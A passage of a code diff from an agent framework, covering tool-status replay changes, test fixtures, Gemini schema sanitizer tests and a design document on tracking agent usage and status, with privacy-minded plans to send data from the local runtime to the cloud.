const allDone = tools.length > 0 && tools.every((t) => t.done);
return JSON.stringify({ tools, allDone });
}
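The retain-detail filter keeps the tool_status payload bounded: only `chart_*` entries carry `callKey`/`args`/`result`, everything else stays a bare name/done pill. A Python sketch of the same payload shaping (function names mirror the TSX; inputs are hypothetical):

```python
def should_retain_detail(tool_name):
    return tool_name.startswith("chart_")


def tool_row_content(tools):
    """Shape the tool_status payload: pills for all, detail for chart_*."""
    out = []
    for t in tools:
        entry = {"name": t["name"], "done": t["done"]}
        if should_retain_detail(t["name"]):
            for k in ("callKey", "args", "result", "isError"):
                if k in t:
                    entry[k] = t[k]
        out.append(entry)
    all_done = bool(out) and all(e["done"] for e in out)
    return {"tools": out, "allDone": all_done}
```

Dropping args/results for pill-only tools is what keeps the payload from growing with every catalog or file-ops call.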
@@ -417,10 +455,19 @@ export function replayEvent(
tools: {},
});
const toolKey = toolUseId || `anonymous-${Object.keys(row.tools).length}`;
row.tools[toolKey] = {
const entry: ToolEntry = {
name: toolName,
done: false,
callKey: toolKey,
};
// Capture args at start for retained-detail tools so the chat
// can show what the agent rendered. Other tools' arguments are
// intentionally dropped to keep the tool_status JSON small.
if (shouldRetainDetail(toolName)) {
const toolInput = event.data?.tool_input;
if (toolInput !== undefined) entry.args = toolInput;
}
row.tools[toolKey] = entry;
if (toolUseId) {
state.toolUseToPill[toolLookupKey(streamId, event.execution_id, toolUseId)] = {
msgId: pillId,
@@ -453,10 +500,38 @@ export function replayEvent(
if (!tracked) break;
const row = state.toolRows[tracked.msgId];
if (!row) break;
const prior = row.tools[tracked.toolKey];
const completedName = prior?.name || tracked.name;
const completed: ToolEntry = {
name: completedName,
done: true,
callKey: tracked.toolKey,
};
// Preserve any args captured at start; capture the result
// envelope for retained-detail tools (chart_* needs spec/file_url
// to mount the live chart).
if (shouldRetainDetail(completedName)) {
if (prior?.args !== undefined) completed.args = prior.args;
const rawResult = event.data?.result;
if (rawResult !== undefined) {
// The framework serializes envelopes as JSON strings. Try to
// parse so the renderer can pick fields cheaply; fall back to
// the raw value when parsing fails (already-an-object or
// non-JSON string).
if (typeof rawResult === "string") {
try {
completed.result = JSON.parse(rawResult);
} catch {
completed.result = rawResult;
}
} else {
completed.result = rawResult;
}
}
const isErr = event.data?.is_error;
if (typeof isErr === "boolean") completed.isError = isErr;
}
row.tools[tracked.toolKey] = completed;
out.push({
id: tracked.msgId,
agent: effectiveName || event.node_id || "Agent",
@@ -60,6 +60,21 @@ _HIVE_PATH_NAMES = (
)
@pytest.fixture(autouse=True)
def _no_seed_mcp_defaults(monkeypatch):
"""Skip bundled-server seeding in MCPRegistry.initialize() for tests.
Production wants ``initialize()`` to seed ``hive_tools`` / ``gcu-tools``
/ ``files-tools`` / ``terminal-tools`` / ``chart-tools`` so a fresh
HIVE_HOME comes up with working defaults. Tests want a deterministic
empty registry every assertion about counts, "no servers installed"
output, or first-element identity breaks otherwise. Patching here
keeps the production API clean and avoids a test-only flag on
``initialize()``.
"""
monkeypatch.setattr(_mcp_registry.MCPRegistry, "_seed_defaults", lambda self: [])
@pytest.fixture(autouse=True)
def _isolate_hive_home_autouse(tmp_path, monkeypatch):
"""Per-test isolation of ``~/.hive`` to ``tmp_path/.hive``.
@@ -0,0 +1,73 @@
"""Tests for the Antigravity Gemini schema sanitizer.
Run with:
cd core
pytest tests/test_antigravity_schema.py -v
"""
import pytest
from framework.llm.antigravity import _sanitize_schema_for_gemini
def test_union_with_null_becomes_nullable():
assert _sanitize_schema_for_gemini({"type": ["string", "null"]}) == {
"type": "string",
"nullable": True,
}
def test_plain_schema_passthrough():
assert _sanitize_schema_for_gemini({"type": "string"}) == {"type": "string"}
def test_recurses_into_properties():
out = _sanitize_schema_for_gemini(
{
"type": "object",
"properties": {
"id": {"type": "integer"},
"owner": {"type": ["string", "null"]},
},
"required": ["id"],
}
)
assert out["properties"]["id"] == {"type": "integer"}
assert out["properties"]["owner"] == {"type": "string", "nullable": True}
assert out["required"] == ["id"]
def test_recurses_into_items():
assert _sanitize_schema_for_gemini({"type": "array", "items": {"type": ["integer", "null"]}}) == {
"type": "array",
"items": {"type": "integer", "nullable": True},
}
def test_recurses_into_combinators():
assert _sanitize_schema_for_gemini({"anyOf": [{"type": ["string", "null"]}, {"type": "integer"}]}) == {
"anyOf": [{"type": "string", "nullable": True}, {"type": "integer"}]
}
def test_does_not_mutate_input():
schema = {"type": "object", "properties": {"x": {"type": ["string", "null"]}}}
snapshot = {"type": "object", "properties": {"x": {"type": ["string", "null"]}}}
_sanitize_schema_for_gemini(schema)
assert schema == snapshot
def test_pure_null_type_falls_back_to_string():
assert _sanitize_schema_for_gemini({"type": ["null"]}) == {
"type": "string",
"nullable": True,
}
def test_multi_type_non_null_union_raises():
"""Silently picking one type would change the contract; fail loud instead."""
with pytest.raises(ValueError, match="Unsupported Gemini schema union"):
_sanitize_schema_for_gemini({"type": ["string", "integer", "null"]})
with pytest.raises(ValueError, match="Unsupported Gemini schema union"):
_sanitize_schema_for_gemini({"type": ["string", "integer"]})
@@ -889,7 +889,7 @@ def test_concurrency_safe_allowlist_is_conservative():
allowlist = ToolRegistry.CONCURRENCY_SAFE_TOOLS
# Positive assertions: known-safe read operations are present.
for name in ("read_file", "terminal_rg", "terminal_find", "search_files", "web_scrape"):
assert name in allowlist, f"{name} should be concurrency-safe"
# Negative assertions: nothing that mutates state is allowed in.
@@ -0,0 +1,331 @@
# Agent Usage & Status Tracking — Capability Document
**Audience:** Lead software architect (paired with frontend + business requirement docs)
**Scope:** Queen agent first (default local-runtime entry point), then downstream colonies/workers
**Status:** Capability inventory + proposal — no implementation commitments
**Date:** 2026-05-04
---
## 1. Why this document exists
We have a business need to track **agent usage** (what was consumed: tokens, cost, runtime, calls) and **agent status** (what state agents are in: alive, phase, progress, blocked) starting from the Queen agent, and surface this **on the cloud** for product and business consumers. This document inventories the capabilities the runtime can expose **today** vs. what is **net-new**, so architecture can pick a scope before frontend and product write against it.
The Queen is the right anchor: every local-runtime session today starts with a Queen, and every colony/worker is forked from a Queen call — so a tracking surface rooted at the Queen automatically covers the whole agent tree.
> **Headline constraint for the architect:** the runtime is **local-by-default**. Every byte described in §3 — events, runtime logs, progress DBs, session state, LLM cost numbers — is written to the user's machine under `~/.hive/` (or the platform-specific Electron `userData` directory). **Nothing is shipped to the cloud today.** The business ask therefore implies a new local→cloud transport boundary, with the data-residency, privacy, and identity decisions that come with it. §4.5 makes the gap explicit per-surface; §8 lists the risks; §9 frames the cloud cut-over as the gating decision for any "Slice 2+" work.
---
## 2. Vocabulary — what we actually mean
| Term | Definition in this codebase |
|---|---|
| **Session** | One Queen runtime instance. ID: `session_{YYYYMMDD_HHMMSS}_{uuid8}`. Persisted at `~/.hive/sessions/{session_id}/`. |
| **Queen** | Long-lived conversational agent. One per session. Single event-loop node. Phases: `independent → incubating → working → reviewing`. See [queen/nodes/__init__.py:494-518](../../core/framework/agents/queen/nodes/__init__.py#L494-L518). |
| **Colony** | Persistent stateless container forked by `create_colony`. Has its own SQLite progress DB at `~/.hive/colonies/{colony_name}/data/progress.db`. |
| **Worker** | Ephemeral agent running inside a colony to execute a task. |
| **Run / execution** | One trigger-to-completion invocation inside a node. Carries `run_id`, `execution_id`, `trace_id` (OTel-aligned). |
| **Usage** | Quantitative consumption: input/output/cached tokens, USD cost, wall-clock latency, tool-call counts. |
| **Status** | Qualitative state: phase, alive/stalled, current task, blocked-on, queue depth, last-heartbeat. |
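The session ID shape in the table can be sketched as follows; only the format string is documented, so the generator itself is an illustrative assumption:

```python
import uuid
from datetime import datetime


def new_session_id(now=None):
    """Build an ID of the documented shape: session_{YYYYMMDD_HHMMSS}_{uuid8}."""
    now = now or datetime.now()
    # uuid8 here means the first 8 hex chars of a random UUID (assumption).
    return f"session_{now.strftime('%Y%m%d_%H%M%S')}_{uuid.uuid4().hex[:8]}"
```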
---
## 3. What exists today (capabilities, not commitments)
The runtime is already heavily instrumented. Most of what business wants is **already emitted** — the gap is persistence, aggregation, and a stable API surface.
### 3.1 Event Bus — the spine
[core/framework/host/event_bus.py:61-177](../../core/framework/host/event_bus.py#L61-L177) defines an in-process async pub/sub with **40+ event types** scoped by `stream_id`, `session_id`, `colony_id`, `execution_id`, `run_id`, `correlation_id`, `timestamp`.
Relevant for usage/status:
- **Lifecycle:** `EXECUTION_STARTED/COMPLETED/FAILED/PAUSED/RESUMED/RESURRECTED`
- **Queen:** `QUEEN_PHASE_CHANGED`, `QUEEN_IDENTITY_SELECTED`
- **Colony/Worker:** `COLONY_CREATED`, `WORKER_COLONY_LOADED`, `WORKER_COMPLETED`, `WORKER_FAILED`, `SUBAGENT_REPORT`
- **LLM:** `LLM_TURN_COMPLETE`, `LLM_TEXT_DELTA`, `LLM_REASONING_DELTA`, `CONTEXT_USAGE_UPDATED`
- **Tools:** `TOOL_CALL_STARTED`, `TOOL_CALL_COMPLETED`, `TOOL_CALL_REPLAY_DETECTED`
- **Health:** `NODE_STALLED`, `NODE_TOOL_DOOM_LOOP`, `STREAM_TTFT_EXCEEDED`, `STREAM_INACTIVE`, `STREAM_NUDGE_SENT`
- **Tasks (right-rail panel):** `TASK_CREATED`, `TASK_UPDATED`, `TASK_DELETED`, `TASK_LIST_RESET`
- **Triggers:** `TRIGGER_AVAILABLE/ACTIVATED/DEACTIVATED/FIRED/REMOVED/UPDATED`
> Persistence today: in-memory only, **plus** optional JSONL export when `HIVE_DEBUG_EVENTS=1` ([event_bus.py:33-54](../../core/framework/host/event_bus.py#L33-L54)). There is no SQL events table.
### 3.2 Three-level runtime logs (per session)
[core/framework/tracker/runtime_log_schemas.py](../../core/framework/tracker/runtime_log_schemas.py) defines:
| Level | Schema | File | Granularity |
|---|---|---|---|
| L1 | `RunSummaryLog` | `summary.json` | Per graph run — totals + execution_quality + trace_id |
| L2 | `NodeDetail` | `details.jsonl` | Per node — exit_status, input/output tokens, latency_ms, retry/accept/escalate/continue counts |
| L3 | `NodeStepLog` | `tool_logs.jsonl` | Per LLM step — tool calls, verdicts, error traces, latency_ms |
Storage: `~/.hive/sessions/{session_id}/logs/` ([runtime_log_store.py](../../core/framework/tracker/runtime_log_store.py)). Schemas already carry OTel fields (`trace_id`, `span_id`, `parent_span_id`) — wire-ready, not yet exported.
### 3.3 LLM call accounting
[core/framework/llm/provider.py:11-32](../../core/framework/llm/provider.py#L11-L32) — `LLMResponse` carries: `model`, `input_tokens`, `output_tokens`, `cached_tokens`, `cache_creation_tokens`, `cost_usd`, `stop_reason`. Cost is computed from [model_catalog.py](../../core/framework/llm/model_catalog.py) when the model is priced; otherwise `0.0`.
> Gap: cost lives in the response object and is rolled into L2/L3 logs, but is **not** in the event bus stream and **not** in any aggregate query surface.
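To make the accounting concrete, a hedged sketch of how `cost_usd` can be derived from a static price catalog. The pricing table, model name, and helper below are illustrative only and not the real `model_catalog.py` format:

```python
# Hypothetical per-million-token price table: (input_usd, output_usd).
PRICE_PER_MTOK = {
    "example-model": (3.00, 15.00),
}


def estimate_cost_usd(model, input_tokens, output_tokens):
    """Estimate USD cost for one LLM call from a static catalog."""
    prices = PRICE_PER_MTOK.get(model)
    if prices is None:
        return 0.0  # unpriced models fall back to zero, as noted above
    in_price, out_price = prices
    return (input_tokens * in_price + output_tokens * out_price) / 1_000_000
```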
### 3.4 Colony Progress DB
[core/framework/host/progress_db.py:44-110](../../core/framework/host/progress_db.py#L44-L110) — per-colony SQLite (WAL mode):
- `tasks` (id, seq, priority, goal, status: pending|claimed|started|completed|failed, worker_id, claimed_at, started_at, completed_at, retry_count, last_error)
- `steps`, `sop_checklist`, `colony_meta`
This is the closest thing we have to a status SQL store today, but it is **per-colony** and **task-shaped** — not session-shaped or usage-shaped.
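A sketch of the kind of status rollup this per-colony store already supports. Column names follow the list above; the exact DDL and any columns not listed are assumptions:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA journal_mode=WAL")  # progress.db runs in WAL mode
conn.execute(
    "CREATE TABLE tasks (id TEXT PRIMARY KEY, seq INTEGER, priority INTEGER,"
    " goal TEXT, status TEXT, worker_id TEXT, retry_count INTEGER DEFAULT 0)"
)
conn.executemany(
    "INSERT INTO tasks (id, seq, priority, goal, status) VALUES (?, ?, ?, ?, ?)",
    [
        ("t1", 1, 0, "fetch data", "completed"),
        ("t2", 2, 0, "clean data", "pending"),
        ("t3", 3, 0, "render chart", "failed"),
    ],
)
# Per-status counts: the core of a colony status panel.
rollup = dict(conn.execute("SELECT status, COUNT(*) FROM tasks GROUP BY status"))
```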
### 3.5 Queen task system (right-rail panel)
The mechanism the IDE-selection prompt describes is real: each `task_update` emits `TASK_UPDATED` on the bus, which a future SSE/WS surface can stream. State transitions: `pending → in_progress → completed`. Task body carries `subject`, `active_form`, `blocks`, `blocked_by`, `metadata`. Source: [tasks/events.py:52-159](../../core/framework/tasks/events.py#L52-L159).
### 3.6 HTTP surface (already shipping)
[core/framework/server/routes_sessions.py](../../core/framework/server/routes_sessions.py):
- `POST /api/sessions` — create
- `GET /api/sessions/{session_id}` — current state including `queen_phase`, `queen_model`, `colony_id`, `uptime_seconds`
- `GET /api/sessions/{session_id}/stats` — runtime statistics (extension point)
- `GET /api/sessions/{session_id}/events/history` — replay persisted events
SSE primitive exists at [server/sse.py](../../core/framework/server/sse.py) but is **not yet wired to a global event-stream route**. This is the natural attach point for a real-time status feed.
### 3.7 Worker health snapshot
`get_worker_health_summary()` ([worker_monitoring_tools.py:71-99](../../core/framework/tools/worker_monitoring_tools.py#L71-L99)) returns: `session_id`, `session_status`, `total_steps`, `recent_verdicts`, `stall_minutes`, `evidence_snippet`. Used today by Queen during the WORKING phase; can be exposed via API.
---
## 3.8 Where every byte lives today (data residency map)
Every storage location below is **on the end-user's machine**. There is no cloud sink, no telemetry endpoint, no managed database, no analytics service. The HTTP server in [core/framework/server/](../../core/framework/server/) binds to localhost for the desktop UI; it is not a cloud API.
`HIVE_HOME` defaults to `~/.hive/` and is overridden by the desktop shell to the platform `userData` dir (e.g. `~/Library/Application Support/Hive/` on macOS, `%APPDATA%\Hive\` on Windows). Source: [config.py:20-44](../../core/framework/config.py#L20-L44).
| Data | On-disk location (per machine) | Format | Lifetime | Currently shipped off-device? |
|---|---|---|---|---|
| Event bus stream | in-process memory only | Python objects | Process lifetime | No |
| Event debug log (opt-in) | `HIVE_HOME/event_logs/<ts>.jsonl` when `HIVE_DEBUG_EVENTS=1` | JSONL | Until user deletes | No |
| Session state | `HIVE_HOME/sessions/{session_id}/state.json` | JSON | Until user deletes | No |
| Conversations | `HIVE_HOME/sessions/{session_id}/conversations/` | JSON | Until user deletes | No |
| Artifacts | `HIVE_HOME/sessions/{session_id}/artifacts/` | mixed | Until user deletes | No |
| L1 run summary (tokens, cost, quality) | `HIVE_HOME/sessions/{session_id}/logs/summary.json` | JSON | Until user deletes | No |
| L2 node details | `HIVE_HOME/sessions/{session_id}/logs/details.jsonl` | JSONL | Until user deletes | No |
| L3 step / tool logs | `HIVE_HOME/sessions/{session_id}/logs/tool_logs.jsonl` | JSONL | Until user deletes | No |
| Colony task / step / SOP state | `HIVE_HOME/colonies/{colony_name}/data/progress.db` | SQLite (WAL) | Until user deletes | No |
| Queen / colony / skill / memory configs | `HIVE_HOME/{queens,colonies,skills,memories}/` | files | Until user deletes | No |
| LLM `cost_usd` numbers | computed in-process from [model_catalog.py](../../core/framework/llm/model_catalog.py), then written into L1/L2/L3 logs above | — | Same as logs | No |
**What this means for the cloud requirement:** the question for the architect is not "where do we get the data" — the data is fully captured. The question is **"how does it leave the machine, in what shape, with whose consent, and where does it land."** That decision is upstream of every endpoint in §6 and every storage option in §5.
Three architectural shapes worth considering (architect to choose):
- **Shape A — On-device only, queried over LAN/tunnel.** Cloud product reaches into the runtime via an authenticated tunnel; no data is replicated. Strongest privacy. Hardest for cross-device rollups.
- **Shape B — Outbox push.** Runtime keeps the local store as source of truth and asynchronously pushes a redacted, billing-grade subset (no prompts, no tool args by default) to a cloud aggregate. Best fit for the typical "agent status dashboard + usage rollup" product.
- **Shape C — Cloud-first runtime.** Runtime writes events directly to a cloud bus and treats local files as a cache. Largest rewrite; not recommended for a desktop-first product.
Shape B is the lowest-friction path to the stated business outcome. The rest of this document is written with Shape B as the default and calls out where Shape A or C would change things.
---
## 4. Capability matrix — what we can offer
Each row is a candidate frontend/business surface, scored by feasibility from current state.
| # | Capability | Status | Backed by |
|---|---|---|---|
| **Status** | | | |
| S1 | Queen phase indicator (independent/incubating/working/reviewing) | **Ready** | `QUEEN_PHASE_CHANGED` event + session detail field |
| S2 | Per-task progress (right-rail) | **Ready** | `TASK_*` events |
| S3 | Live LLM streaming indicator (typing, thinking, tool-calling) | **Ready** | `LLM_TEXT_DELTA`, `LLM_REASONING_DELTA`, `TOOL_CALL_STARTED/COMPLETED` |
| S4 | Stall / stuck-agent detection | **Ready** | `NODE_STALLED`, `STREAM_INACTIVE`, `NODE_TOOL_DOOM_LOOP` |
| S5 | Colony tree (Queen → colonies → workers) snapshot | **Partial** | Data exists in session/colony stores; needs a join query |
| S6 | Worker health roll-up across colonies | **Partial** | Per-worker tool exists; needs an aggregation route |
| S7 | Liveness heartbeat ("agent X last seen Y ago") | **Net-new** | Must derive from event timestamps or add a periodic ping |
| S8 | Trigger schedule (when will Queen wake next) | **Ready** | `TRIGGER_*` events |
| **Usage** | | | |
| U1 | Tokens per session (input/output/cached) | **Partial** | Captured per-step in L3, summed in L1; no API |
| U2 | USD cost per session / colony / model | **Partial** | `cost_usd` per LLM call in logs; no rollup |
| U3 | Tool-call counts and types | **Partial** | Events exist; no aggregate |
| U4 | Wall-clock runtime and active-time per agent | **Partial** | Derivable from `EXECUTION_STARTED/COMPLETED` |
| U5 | Cost attribution per Queen-spawned colony | **Partial** | `colony_id` is on every event; needs a query |
| U6 | Per-user / per-tenant aggregation | **Net-new** | No user/tenant identity in events today |
| U7 | Daily / monthly usage rollups for billing | **Net-new** | Requires persistent event store |
| U8 | Quota / cap enforcement (block when over budget) | **Net-new** | Requires real-time meter + policy hook |
**Read of the matrix:** ~70% of "status" surfaces are **shipping-grade today** behind a thin local API. ~70% of "usage" surfaces need a **persistence + aggregation layer**. The events themselves are not the bottleneck.
**Local vs. cloud read of the same matrix.** Every "Ready" / "Partial" cell above is *ready in-process on the local machine*. Making each row visible to a **cloud** consumer adds an additional step:
| Capability class | Local (today / near-term) | Cloud (business ask) |
|---|---|---|
| Live status (S1-S4, S8) | Stream from in-process event bus over local SSE | Push events through outbox → cloud relay → cloud SSE/WS to product UI. |
| Tree / health (S5, S6) | Join local session + colony stores | Same join, but on cloud-side replica of session/colony index. |
| Liveness (S7) | Derive from local event timestamps | Requires the runtime to *post* a heartbeat; cloud cannot infer aliveness from absence. |
| Per-session usage (U1-U5) | Read L1/L2/L3 logs on disk | Outbox sends durable rows (no deltas) to cloud usage table. |
| Tenant rollups (U6-U7) | Not possible — no identity in events | Cloud-side aggregation keyed on session→user join, identity attached at outbox time. |
| Quotas (U8) | Local meter feasible, but pointless without cloud truth | Cloud is the meter of record; runtime calls home to check. |
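The local path for S7 is cheap to prototype. A sketch of deriving "last seen" from event timestamps; the event field name is an assumption based on §3.1:

```python
import time


def last_seen_seconds(events, now=None):
    """Seconds since the most recent event, or None if there are no events.

    Note the §8.5 caveat: a long gap can mean idle-by-design, not dead,
    so this signal alone must not page anyone.
    """
    if not events:
        return None
    now = time.time() if now is None else now
    return now - max(e["timestamp"] for e in events)
```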
---
## 5. Proposed data model (architect to validate)
Three new persisted entities, plus reuse of existing event types:
```
AgentSession UsageEvent StatusSnapshot
----------- ----------- ---------------
session_id (PK) id (PK) session_id (FK)
queen_id session_id (FK) taken_at
queen_model colony_id phase
started_at worker_id active_run_id
ended_at agent_role (queen|worker) active_node
status (active|done|failed) event_type (LLM|TOOL|...) open_task_count
user_id (when multi-tenant) model in_flight_workers
tenant_id (when multi-tenant) input_tokens last_event_at
total_input_tokens output_tokens stall_score
total_output_tokens cached_tokens
total_cached_tokens cost_usd
total_cost_usd latency_ms
total_tool_calls tool_name (nullable)
last_event_at occurred_at
trace_id
execution_id
```
Storage choice (architect call). **All three options today are local; only Option C reaches the cloud business surface.**
- **Option A — local SQLite outbox** at `HIVE_HOME/runtime.db`. Pros: zero infra, fits desktop, makes local queries cheap. Cons: per-host; no cross-device aggregation; **does not satisfy the cloud requirement on its own.**
- **Option B — DuckDB on the existing JSONL event logs.** Pros: zero ingestion code; analyst-friendly. Cons: cold-start latency on big histories; **also local-only.**
- **Option C — push events to a managed cloud store** (Postgres, ClickHouse, BigQuery) via an outbox pattern. Pros: cross-host rollups, billing-grade, the only option that actually delivers the cloud-visible status/metrics product. Cons: introduces a new transport, identity, and privacy/redaction story; needs explicit user opt-in for desktop builds.
The realistic shape is the hybrid called out in §3.8 Shape B: **A locally** as the durable buffer and source of truth, **C in the cloud** as the business-facing aggregate, with a one-way outbox that moves a *redacted, durable-event-only* subset over the wire. This document recommends that hybrid; everything in §6 and §7 is written against it.
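As a sketch of Option A, the proposed `UsageEvent` entity maps to a single append-only SQLite table, and the per-session rollup that would back `GET /api/sessions/{id}/usage` is one aggregate query. Column set follows the entity diagram above; types and the table name are assumptions:

```python
import sqlite3

conn = sqlite3.connect(":memory:")  # stand-in for HIVE_HOME/runtime.db
conn.execute(
    "CREATE TABLE usage_events ("
    " id INTEGER PRIMARY KEY, session_id TEXT, colony_id TEXT,"
    " agent_role TEXT, event_type TEXT, model TEXT,"
    " input_tokens INTEGER, output_tokens INTEGER, cached_tokens INTEGER,"
    " cost_usd REAL, latency_ms INTEGER, tool_name TEXT, occurred_at TEXT)"
)
conn.executemany(
    "INSERT INTO usage_events (session_id, agent_role, event_type, model,"
    " input_tokens, output_tokens, cost_usd) VALUES (?, ?, ?, ?, ?, ?, ?)",
    [
        ("s1", "queen", "LLM", "model-a", 1000, 200, 0.004),
        ("s1", "worker", "LLM", "model-b", 500, 100, 0.001),
    ],
)
# Per-session usage rollup — the shape /sessions/{id}/usage would return.
usage = conn.execute(
    "SELECT SUM(input_tokens), SUM(output_tokens), ROUND(SUM(cost_usd), 6)"
    " FROM usage_events WHERE session_id = ?",
    ("s1",),
).fetchone()
```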
---
## 6. Surface API — what frontend would consume
All routes assume the event-bus → SSE bridge exists (the one missing wire — see §3.6). Frontend sees this from day one.
> **Locality note.** The `/api/...` routes below are served by the **local runtime HTTP server** today. For the cloud product, the same shapes need a cloud-side counterpart fed by the outbox. Two practical patterns: (1) cloud product calls cloud-hosted versions of these routes (against the aggregate), or (2) cloud product proxies authenticated requests back to the user's runtime. §3.8 Shape A vs. Shape B picks between them.
### Real-time channel
```
GET /api/sessions/{session_id}/events/stream (SSE)
↳ filter=phase,task,llm_stream,tool,worker,trigger,health
GET /api/agents/queen/stream (SSE) — global queen events
```
### Status reads
```
GET /api/sessions/{session_id} — already shipping
GET /api/sessions/{session_id}/tree — Queen → colonies → workers
GET /api/sessions/{session_id}/health — stall_score, last_event_at, in_flight
GET /api/colonies/{colony_id}/workers — health roll-up
```
### Usage reads
```
GET /api/sessions/{session_id}/usage — tokens, cost, latency, tool-calls
GET /api/sessions/{session_id}/usage/by-model — split by model
GET /api/colonies/{colony_id}/usage — same shape, colony scope
GET /api/agents/queen/usage?range=...&group_by=... — rollup view (billing)
```
### Admin / business
```
GET /api/usage/rollup?range=...&group_by=user|tenant|model|colony
POST /api/quotas/{tenant} — set caps (if quota work in scope)
```
---
## 7. Net-new work — sized in shirt-size, not days
| Workstream | Local / Cloud | Size | Depends on | Notes |
|---|---|---|---|---|
| Event-bus → local SSE bridge ([sse.py](../../core/framework/server/sse.py) exists, route does not) | Local | **S** | — | Unlocks all real-time status surfaces in the desktop UI. Highest leverage piece. |
| Persisted local event store (SQLite outbox) | Local | **M** | Decision §5 | One writer, append-only; reuse existing JSONL writer. Source of truth for cloud push. |
| Local aggregation queries + `/usage` endpoints | Local | **M** | Persisted store | Per-session usage on disk. |
| **Outbox transport (local → cloud)** | **Boundary** | **M-L** | Local store + auth | New work: durable queue, retry, redaction policy, opt-in switch, schema versioning. This is the bridge to the cloud product. |
| **Cloud event ingest + aggregate store** | **Cloud** | **L** | Outbox transport | New cloud infra (Postgres/ClickHouse/BigQuery). Hosting, ops, retention policy, access controls. |
| **Cloud-side status/usage API + dashboards** | **Cloud** | **M** | Cloud aggregate | Mirrors §6 endpoints against the cloud store; this is what business users actually see. |
| Identity layer (user_id / tenant_id on events) | Boundary | **M** | Auth model | Currently no user identity in events. Identity attaches at outbox time, not at emit time. |
| OpenTelemetry exporter (schema is ready) | Boundary | **S-M** | — | `trace_id`/`span_id` already populated; an OTel collector can be the cloud sink instead of a custom outbox. |
| Quota / policy hooks | Cloud-authoritative | **L** | Cloud store + identity | Cloud holds the meter; runtime calls home synchronously on a critical path. |
| Liveness/heartbeat (S7) | Local emit, cloud consume | **S** | Outbox | Runtime must actively post; cloud cannot infer liveness from absence. |
| Cost attribution UI rollups | Cloud | **S** | `/usage` cloud endpoints | Shared with frontend doc. |
**Critical path for first frontend release (local desktop UI):** SSE bridge → status endpoints (S1-S5) → per-session usage endpoint (U1, U2). Everything else is incremental.
**Critical path for first cloud release (business ask):** local event store → outbox transport with redaction + opt-in → cloud ingest → cloud `/usage` and `/status` endpoints. The local UI work above is *not* a prerequisite for the cloud cut, but most of the local-side primitives (event store, durable-event filtering) are shared, so doing them in order minimizes rework.
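The outbox transport workstream can be sketched as a small flush loop: read a batch of unsent rows, push them to cloud ingest, mark them sent on success, back off on failure. Every callable and the row shape below are placeholders; none of this API exists yet:

```python
import random
import time


def flush_outbox(fetch_unsent, mark_sent, send, max_attempts=5):
    """Push one batch of durable rows to the cloud; return rows delivered.

    Rows stay in the local store (source of truth) until mark_sent runs,
    so a crash mid-flush only risks duplicate delivery, never loss.
    """
    batch = fetch_unsent(limit=100)
    if not batch:
        return 0
    for attempt in range(max_attempts):
        try:
            send(batch)  # one network call per batch, not per event
            mark_sent([row["id"] for row in batch])
            return len(batch)
        except ConnectionError:
            # Exponential backoff with jitter; capped so retries stay sane.
            time.sleep(min(2 ** attempt, 60) * (1 + random.random()))
    return 0  # give up for now; rows remain unsent locally
```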
---
## 8. Risks and tradeoffs the architect should weigh
1. **Event volume.** `LLM_TEXT_DELTA` fires per token. A persisted store must filter — don't write deltas, write `LLM_TURN_COMPLETE`. This is the #1 way the table blows up.
2. **Privacy / desktop posture — the central architectural constraint.** The runtime is local by default ([config.py:20-44](../../core/framework/config.py#L20-L44)). The data inventory in §3.8 confirms that **no data leaves the user's machine today**, including the data the business ask needs in the cloud. Closing that gap is not "add a metrics push" — it is a new system boundary with: (a) explicit user opt-in (defaults must be safe for OSS / self-hosted users), (b) a documented redaction list (no prompts, no tool args, no file paths in the default payload), (c) schema versioning so cloud aggregates do not break on runtime upgrades, (d) a clear answer for self-hosted / air-gapped deployments where the cloud sink is unreachable, (e) regional data-residency rules if the product is sold internationally. This is the single largest design decision in the document.
3. **Cost-table accuracy.** `cost_usd` is computed from a static catalog. Using it for billing means committing to keeping the catalog current (or pulling from provider invoices). For *display*, the current approach is fine; for *charging*, it is not.
4. **Identity coupling.** Events are session-scoped today. Adding `user_id`/`tenant_id` everywhere is invasive. Recommend pinning identity at the *session* boundary and joining on session at query time, rather than threading identity through every event payload.
5. **Status vs. heartbeat semantics.** "Idle" is not "dead." A Queen sitting in `independent` waiting for a user message is healthy and should not page anyone. The stall-score in §5 must distinguish idle-by-design from stalled-by-bug — the existing `STREAM_INACTIVE` / `NODE_STALLED` events already make this distinction; preserve it.
6. **Backpressure from observability.** If usage tracking sits in the LLM call path (for quotas), it must not add latency. Recommend: meter is async/eventual for display; only quota checks are synchronous, and only when the customer has a quota.
7. **Worker-side gap.** Worker LLM calls are accounted in their own session's L1-L3 logs but are *not* automatically rolled into the parent Queen session. Cost attribution from Queen → spawned colony requires either (a) a parent_session_id field on the colony's session row, or (b) walking the `COLONY_CREATED` event graph at query time. (a) is cleaner.
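Risk 1's mitigation is a one-function filter between the event bus and the persisted store. Event-type names come from §3.1; the allowlist membership itself is a proposal, not shipped behavior:

```python
# Only durable event types reach the persisted store; per-token stream
# deltas (LLM_TEXT_DELTA and friends) are dropped before they can bloat it.
DURABLE_EVENT_TYPES = frozenset({
    "EXECUTION_STARTED", "EXECUTION_COMPLETED", "EXECUTION_FAILED",
    "LLM_TURN_COMPLETE", "TOOL_CALL_COMPLETED",
    "QUEEN_PHASE_CHANGED", "WORKER_COMPLETED", "WORKER_FAILED",
})


def durable_only(events):
    """Yield only events worth persisting; drop high-volume stream deltas."""
    for event in events:
        if event["type"] in DURABLE_EVENT_TYPES:
            yield event
```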
---
## 9. Recommendation
Ship in four thin slices. The first two are local-only and unblock the desktop UI; the last two are what actually deliver the business ask of cloud-visible status and metrics.
1. **Slice 1 — Live local status (1 sprint, fully local).**
SSE bridge + `/sessions/{id}/events/stream` + `/sessions/{id}/health` + `/sessions/{id}/tree`. Frontend (local UI) gets the right-rail and the agent-tree. No persistence work, no cloud. (S1-S5, S8.)
2. **Slice 2 — Per-session local usage store (1-2 sprints, fully local).**
Persisted event store (SQLite outbox at `HIVE_HOME/runtime.db`), filtered to durable event types only. `/sessions/{id}/usage` + `/colonies/{id}/usage`. No identity, no rollups, **no cloud transport yet**. This is the foundation the cloud slice rides on. (U1-U5.)
3. **Slice 3 — Local→cloud outbox + cloud ingest (the cloud cut, scope-defining).**
Durable outbox queue, redaction policy, opt-in toggle, identity attachment, schema versioning, retry/backoff. Cloud-side ingest service + aggregate store. **This is where the local-only world becomes a cloud product.** Architect must decide §3.8 Shape, §5 storage, redaction defaults, and identity model before this slice can start.
4. **Slice 4 — Cloud rollups, dashboards, quotas (scope TBD with product).**
